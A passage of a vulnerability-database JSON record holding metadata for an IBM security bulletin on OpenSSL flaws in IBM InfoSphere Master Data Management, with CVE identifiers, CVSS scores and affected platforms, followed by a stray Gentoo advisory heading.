Applicable\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.5.0;9.7.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSWSR9\",\"label\":\"IBM InfoSphere Master Data Management\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"10.1;10.0\",\"Edition\":\"Standard\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2022-09-26T03:31:32", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities exist in the OpenSSL component of IBM Initiate Master Data Service and IBM InfoSphere Master Data Management Standard Edition (CVE-2013-0166, CVE-2013-0166, CVE-2012-2686)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2686", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-2686"], "modified": "2022-09-26T03:31:32", "id": "51A25EC520455269A79F9DDA6AEB73FB003F12BAA0B35BFB5A6A50A403534F59", "href": "https://www.ibm.com/support/pages/node/497667", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}

Gentoo Security Advisory GLSA 201401-15

Description

Related